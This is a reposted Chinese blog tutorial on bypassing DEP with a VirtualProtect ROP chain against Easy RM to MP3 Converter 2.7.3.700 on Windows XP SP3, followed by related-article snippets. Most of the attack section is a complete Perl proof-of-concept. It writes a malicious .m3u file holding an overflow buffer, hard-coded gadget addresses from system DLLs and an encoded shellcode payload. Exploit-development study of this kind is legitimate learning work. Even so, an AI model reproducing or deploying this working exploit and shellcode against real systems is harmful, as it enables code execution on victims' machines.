VirtualProtect 2方法 -direct ret-dep-easy rm to mp3

最新推荐文章于 2023-12-22 00:29:01 发布
最新推荐文章于 2023-12-22 00:29:01 发布
阅读量125 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/zcc1414/p/3982345.html
版权



本次试验已经解决了 00字符的问题,

还有的问题在于用了很多的 系统DLL   试验在 XP SP3 下进行的~~~~

例子软件:easy rm to mp3 2.7.3.700~~~~~~~~~~~~~~~~~~~~~~~


ROP链 =   很多歌ROP小配件

ROP小配件 =  每个指令 + ret

怎么找 ROP小配件:  1 直接找一些指令+ret  2 直接找到全部 ret 往回看是否符合需要  3 通过插件来寻找

!pvefindaddr noaslr  寻找 no aslr 的模块

!pvefindaddr rop -m kernel32.dll nonull //rop选项会自动忽略 aslr 模块

开始构造参数前,我们可以去 手动构造 参数 看看是否 VirtualProtect 可以成功


精巧布置参数:

1) shellcode指针,最简单的方法就有事把ESP 的地址放在一个寄存器中,然后增长它指向 shellcode,当然也可能有其他方法

2)shellcode 大小 ,

3)0x40 ,   设置一个寄存器一个开始值然后增加直到它包含 0x40 ,或者可以找在寄存器的值 add / sub 得到 0x40,开始值放入

~~~~~动态将构造的值放回栈上  可以增加ESP 去覆盖,也可以直接 mov dword ptr [reg+offset]

构造阶段1 )保存栈指针然后跳过参数

比如 (下面为伪代码)   执行完要到达 XXXX,   edi = eax = 原esp  

ret

push esp,    pop edi,      ret

push edi,     pop eax,      pop ebp,     ret

add esp,0x20 ,               ret

VirtualProtect address

param1  return address

param2  lpAddress

param3  Size

param4  flNewProtect

param5  writeable address

padding nop 8bytes

XXXX

构造阶段2)精巧制作第一个参数(返回值)

构造shellcode 起始地址,和VirtualProtect 函数的返回值,当函数已经将页面标记为可执行时,它会自动跳到那里

比如 (下面为伪代码) 

xchg esi,edi      #edx ecx   #ret 4

add eax,0x100  pop ebp  ret 

padding nop 8 bytes

mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret

padding  nop  4 bytes

 工具: http://sourceforge.net/projects/unxutils/
        想在windows上使用unix,其实大量几乎所有的unix工具被翻译了对应的windows的可执行exe程序,我们可以下载这些工具然后路径加入系统的path,然后就可以像使用windows系统自带的dos命令一样使用这些工具。通过这种方式我们可以在windows上使用大部分的unix的工具,对于从unix,linux到windows的用户,可以很好的保持原来的习惯和知识,对于本来的windows用户也可以使用这些工具提高工作效率,特别地在windows的批处理中使用这些命令很方便。
cat rop.txt | grep "MOV DWORD PTR DS:\[ESI+10],EAX #MOV EAX,ESI"

构造阶段3)精巧制作第二个参数(lpAddress)

可以简单的使用同样的指针,但要做一些修改

push eax  # pop esi  $ret

add eax,100  #pop ebx, ret

padding nops 4 bytes

add esi,4 + ret  / 4个  inc esi,ret

mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret

padding  nop  4 bytes

构造阶段4)精巧制作第三+四个参数(大小+保护标志0x40)

第三个参数设置为 0x300, 需要小配件为 xor eax,eax, add eax,0x100

增加ESI 4字节  EAX写入 esi+0x10

第四个参数也差不多

push eax  # pop esi  $ret

xor eax,eax  ret

add eax,0x100  pop ebp

padding  nop  4 bytes

add eax,0x100  pop ebp

padding  nop  4 bytes

add eax,0x100  pop ebp

padding  nop  4 bytes

add esi,4 + ret  / 4个  inc esi,ret

mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret

padding  nop  4 bytes


push eax  # pop esi  $ret

xor eax,eax ret

add eax,0x40  pop ebp ret

padding  nop  4 bytes

add esi,4 + ret  / 4个  inc esi,ret

mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret

padding  nop  4 bytes


sub eax,4  # ret

sub eax,4  # ret

push eax, pop esp  mov eax,edi, pop edi, pop esi, ret


最后放置shellcode  即可运行~~~~~


Perl  POC: 详细代码:

my $file = "exploits.m3u";#perl  

my $junk= "\x41"x26075;


my $ret = pack("V",0x7C80165E);#RET

my $padding = "x"x4;

my $ajust = pack("V",0x771F8022);# PUSH ESP # MOV EAX,EDX # POP EDI # RETN  [Module : comctl32.dll]  **
$ajust = $ajust.pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** 
$ajust = $ajust."x"x4;
$ajust = $ajust.pack("V",0x73DB2638); # ADD ESP,20 # RETN 4 	[Module : MFC42.DLL]  ** 

my $AddressOfVirtualProtect = pack("V",0x7C801AD4);   #esp now 
my $param1 = "1111";
my $param2 = "2222";
my $param3 = "3333";
my $param4 = "4444";
my $param5 = "5555";
my $param = $param1.$param2.$param3.$param4.$param5."x"x8;
#####################11111111111111111111111#########################################
my $makeparam1 =  pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  保存esi = original esp
$makeparam1 = $makeparam1."x"x4; #top  RETN 4

$makeparam1 = $makeparam1.pack("V",0x77BEE842);# PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam1 = $makeparam1."x"x4;

$makeparam1 = $makeparam1.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
$makeparam1 = $makeparam1."x"x4;
$makeparam1 = $makeparam1.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
$makeparam1 = $makeparam1."x"x4;

# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  first param1 eax = address of shellcode
$makeparam1 = $makeparam1.pack("V",0x73DC0270); 
$makeparam1 = $makeparam1."x"x4;

#####################22222222222222222222222#########################################
my $makeparam2 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam2 = $makeparam2."x"x4; #top ret 4
$makeparam2 = $makeparam2."x"x4;

$makeparam2 = $makeparam2.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  保存esi = original esp

$makeparam2 = $makeparam2. pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  **   esi+4
$makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
$makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
$makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 

$makeparam2 = $makeparam2.pack("V",0x77BEE842);# PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam2 = $makeparam2."x"x4;
$makeparam2 = $makeparam2.pack("V",0x77C1EC2B);# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
$makeparam2 = $makeparam2."x"x4;
$makeparam2 = $makeparam2.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
$makeparam2 = $makeparam2."x"x4;

# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param2 eax = address of shellcode
$makeparam2 = $makeparam2.pack("V",0x73DC0270); 
$makeparam2 = $makeparam2."x"x4; 

#####################33333333333333333333333#########################################
my $makeparam3 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam3 = $makeparam3."x"x4; #top ret 4
$makeparam3 = $makeparam3."x"x4;
$makeparam3 = $makeparam3.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  保存esi = original esp
$makeparam3 = $makeparam3.pack("V",0x5D174FB8);  # XOR EAX,EAX # RETN 	[Module : COMCTL32.dll]  ** 

$makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax = 100
$makeparam3 = $makeparam3."x"x4;

$makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax =200
$makeparam3 = $makeparam3."x"x4;

$makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax = 300
$makeparam3 = $makeparam3."x"x4;

$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  **   esi+8
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  **   
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 

# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param3 
$makeparam3 = $makeparam3.pack("V",0x73DC0270); 
$makeparam3 = $makeparam3."x"x4; 

#####################44444444444444444444444#########################################
my $makeparam4 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam4 = $makeparam4."x"x4; #top ret 4
$makeparam4 = $makeparam4."x"x4;
$makeparam4 = $makeparam4.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL42.dll]  **  保存esi = original esp
$makeparam4 = $makeparam4.pack("V",0x5D174FB8);  # XOR EAX,EAX # RETN 	[Module : COMCTL42.dll]  ** 

$makeparam4 = $makeparam4.pack("V",0x77C1EC1D);  # ADD EAX,40 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax =40
$makeparam4 = $makeparam4."x"x4;

$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  **   esi+0xc
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  **   
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  **   
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 

# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param4 
$makeparam4 = $makeparam4.pack("V",0x73DC0270); 
$makeparam4 = $makeparam4."x"x4; 

#####################55555555555555555555555#########################################
my $makeparam5 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam5 = $makeparam5."x"x4; #top ret 4
$makeparam5 = $makeparam5."x"x4;
$makeparam5 = $makeparam5.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL42.dll]  **  保存esi = original esp

$makeparam5 = $makeparam5.pack("V",0x77BEE842);  # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam5 = $makeparam5."x"x4;

$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 

$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  **   esi+0x10
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 


# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param4 
$makeparam5 = $makeparam5.pack("V",0x73DC0270); 
$makeparam5 = $makeparam5."x"x4; 

#####################just#########################################
my $just = pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$just = $just.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 

$just = $just.pack("V",0x5D19E24D);  # XCHG EAX,ESP # RETN 	[Module : COMCTL32.dll]  ** 
$just = $just."x"x4; #top 4



#shellcode start esp
my $shellcode = "\x90"x76;
$shellcode = $shellcode."\x81\xEF\xEE\xFD\xFF\xFF";    #SUB EDI,-212

#shellcode start edi
$shellcode = $shellcode."WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylaxrJTJP8Wn0h3SK98QpOe84rqdLQDLLKXtNmSNYdUckkoGdDFKKSsVoKvSp2RsaxcEPsU5Qbsd03N21tLKPZ4pNkqKflLKQKDLLKEKLKuKLKQKtXlKJKlmwMbJ5ZTxeNrUGuJ5KO1GZXJ550LKw57LlKPLWuQhUShMLKPYGPWskmvSKOQWlKttOKDCkEJ9dOoNVf4zzdBT7xKqKzc7gsJpqV8kJQukQDddglaezDLKSia4S3IMcVLKwLQkLKQIELESKmS3dloKlUqONKqGQqWMqzVjP8eNrUI9WC9KPSphpdQq6PWS586CpPpaBNnkKtRsPPpP2syo1GKL0SKORw";
my $payload= $junk.$ret.$padding.$ajust.$AddressOfVirtualProtect.$param.$makeparam1. $makeparam2.$makeparam3.$makeparam4.$makeparam5.$just.$shellcode;

print length($payload);
open($FILE,">$file");    
binmode($FILE);#######
print $FILE $payload;    
close($FILE);




















转载于:https://www.cnblogs.com/zcc1414/p/3982345.html

weixin_30885111
关注
Easy RM to MP3 Converterv2.7.3(CVE-2009-1330)漏洞
06-20 522
软件名称:Easy RM to MP3 Converter 软件版本:2.7.3 漏洞模块:PM2MP3Converter.exe 操作系统:Windows 7\sp1\x86 漏洞编号:CVE-2009-1330 危害等级:中危 漏洞类型:缓冲区溢出 威胁类型:本地 1. 软件介绍 Easy RM to MP3 Converter为05-06年流行的支持常用音频格式文件MP3,...
VirtualProtect 3方法 -seh ret-ASLR-dep-Adrenalin Player 2.2.5.3
zcc1414的专栏
06-30 1108
环境  :  WIN7     寻找 无ASLR+DEP 的DLL 去溢出 !pvefindaddr rop 慢慢 搜  也可以 先搜索出 !pvefindaddr noaslr 才对指定 然后查找合适的东西 EG:  cat rop.txt | grep -I "ADD ESP,4" > 1.txt 因为是覆盖 SEH handler  所以 覆盖的 ROP小配件不是连续的,首先要先跳到
Easy RM to MP3 Converter 2.7.3.700
03-12
Easy RM to MP3 Converter 2.7.3.700
Easy RM to MP3 漏洞调试
xiaoeryu_的博客
03-18 354
0X00 前言 分析这个漏洞主要是为了学习怎么通过调试并编写溢出类型漏洞的EXP 0X01 分析环境 调试环境 版本 系统版本 XP_sp3 Easy RM to MP3 2.7.3.700 windbg 6.12 0X02 漏洞描述 这个漏洞是一个典型的溢出类型漏洞,在处理字符的时候没有对长度做限制,在读取到第25000~30000个字符的时候会导致返回地址被覆盖导致溢出 0X03 漏洞分析 编写perl脚本生成漏洞验证文件 my $file= "crash25000.m3u"
Easy RM to MP3 Converter(2.7.3.700)栈溢出漏洞调试笔记
weixin_33778544的博客
03-08 446
Debug_Orz · 2014/10/13 17:410x00 基础知识1 Windows环境选取wmplayer.exe程序运行时的内存布局示意,包括栈,堆,加载模块(DLLs)和可执行文件本身。Win32进程空间布局示意。1.2 入口点(Entrypoint)运行一个EXE的时候,会先根据IAT表加载相应的DLL,并且用GetProcAddress得到API的真实地址。也就是说EXE运行后,...
Easy RM to MP3 Converter Version 2.7.3 700漏洞分析
w4y2'blog
04-03 1942
软件链接:http://pan.baidu.com/s/1eQcLbpw 测试环境:xp sp3 看了exploit编写教程第一篇,知道了这个小软件有溢出漏洞,教程上用的是windbg分析的,由于咱习惯了界面友好的OD,对于教程上的分析步骤不是很感冒,既然知道了这是个有溢出漏洞的软件,那不如自己用OD亲自实践一把。   运行程序,界面如图,下方为它的版本号。    
ph-malhide:进程黑客 2 隐藏在外部应用程序中
06-02
- **Process-Hacker-2**: 可能是指一个开源的进程查看和管理系统工具,也可能指的是这种恶意软件技术的一个特定实例或变种。 - **MinHook**: MinHook是一个轻量级的API钩子库,用于在Windows平台上实现钩子功能,常...
利用Ret2Libc挑战DEP之二——利用VirtualProtect
Yx0051的博客
08-14 895
感觉最近作者给出的shellcode,有一种“他就是这样”、“这样的shellcode是最合理”的感觉了。刚开始看有点看不懂,但是跟着最终实现代码一点点跟,就会发现这个代码的巧妙之处。 0x01 环境 系统:Windows 2003 SP2 编译器:VS2008 注意编译选项: release版本 禁用优化(C++——optimization disable) GS禁用(C++——c
0day 第12章--12.3.3 Ret2Libc实战之利用VirtualAlloc
I have a dream
04-08 445
实验环境: Winxp sp3 VS2010 实验配置: 禁用优化、关闭GS、关闭safeseh、开启DEP 思路:当程序需要一段可执行内存时,可以通过kernel32.dll的VirtualAlloc申请一段具有可执行属性的内存。因此可通过利用此函数将shellcode复制到申请的内存空间中,以绕过DEP。 如何利用? 将返回地址覆盖为VirtualAlloc的地址,参数输入进去即可。 ...
ssdt.rar_SSDT DELPHI_SSDT-hook delphi_Table_delphi ssdt_ssdt
09-22
在Delphi中实现SSDT挂钩,开发者通常需要深入理解Windows API,特别是与系统服务相关的函数,如`ZwQuerySystemInformation`来获取SSDT信息,以及可能用到的内存操作函数,如`VirtualProtect`来修改页面保护属性以便...
适合中文版本的Easy RM to MP3 Converter rop 过depexploit
thesum的专栏
05-01 910
#------------------------------------------------------------ #ROP based exploit for Easy RM to MP3 Converter #written by corelanc0d3r - http://www.corelan.be #-------------------------------------
经典栈溢出 Easy RM to MP3 Converter
钞sir的博客
10-24 4329
以一个样本(Easy RM to MP3 Converter)将作为经典栈溢出的讲解实例,首先说明此实验是WIN10环境下复现的; “Easy RM 2 MP3 Converter”是一个音频格式的转换工具,年代比较久远了。在2009年7月17日,packetstormsecurity公开了该软件的一个栈溢出漏洞并提供了exploit:https://packetstormsecurity.co...
Easy RM to MP3 Converter漏洞分析报告
qq_32843153的博客
08-17 394
Easy RM to MP3 Converter漏洞分析报告   软件名称:PCManFTP 软件版本:2.0 漏洞模块:RM2MP3Converter.exe 模块版本:2.7.3.700 编译日期:2006-09-29 操作系统:Windows XP/2003/7/8.1/10 漏洞编号:NULL 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:本
游戏异常处理(转)
08-31 512
如何定位导致Crash的代码位置 (转)VC调试入门 游戏异常处理(转)技术类   2009-05-31 18:10   阅读24   评论0   字号: 大大  中中  小小  1.      前言 几 乎每个游戏都或多或少地存在着缺陷,辛辛苦苦完成的游戏要是最终在玩家那里崩溃了,对开发人员来说可能是
9.3 Ret2Libc 实战之利用VirtualProtect
qq_55202378的博客
11-08 2143
VirtualProtect DEP绕过
【反调试】Windows 利用动态 AES 加密程序内存
最新发布
溡漪幽博客
12-22 1664
动态内存加密解密技术是计算机安全领域中重要的一部分,它保护程序在运行时所使用的内存数据,防止被恶意程序或攻击者窃取敏感信息,也被用于软件的反调试序列。本文将介绍动态内存加密解密技术的实现,包括动态加密技术的作用、简单异或加密内存以及动态 AES 加密解密方法实现内存中变量以及函数的动态加密。
全面介绍Windows内存管理机制及C++内存分配实例
zhujunwsk的专栏
09-08 2889
(一):进程空间   本文背景: 在编程中,很多Windows或C++的内存函数不知道有什么区别,更别谈有效使用;根本的原因是,没有清楚的理解操作系统的内存管理机制,本文企图通过简单的总结描述,结合实例来阐明这个机制。 本文目的: 对Windows内存管理机制了解清楚,有效的利用C++内存函数管理和使用内存。 1.      进程地址空间 1.1地址空间 ·        32|
VirtualProtect()
windroid.xyz
01-02 6580
VirtualProtect 改变调用进程的一段页的保护属性。要改变其他进程,请使用 VirtualProtectEx 函数。 BOOL WINAPI VirtualProrect( __in    LPVOID lpAddress , __in    SIZE_T dwSize , __in    DWORD flNewProtect , __out  PDWORD lpfl
VirtualProtect函数
热门推荐
zacklin的专栏
04-19 3万+
首先我们来看看MSDN上对VirtualProtect函数的说明。 BOOL VirtualProtect(    LPVOID lpAddress,    DWORD dwSize,    DWORD flNewProtect,    PDWORD lpflOldProtect  );   各参数的意义为: lpAddress,要改变属性的内存起始地址。 dwSize,要改变属性的内存区
call ds:VirtualProtect
06-10
`call ds:VirtualProtect` 是一条汇编指令,用于调用 Windows API 中的 VirtualProtect 函数。它的作用是修改指定地址的内存页属性,可以用于改变内存页的保护级别,比如将一个可读写的内存页修改为只读或可执行。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值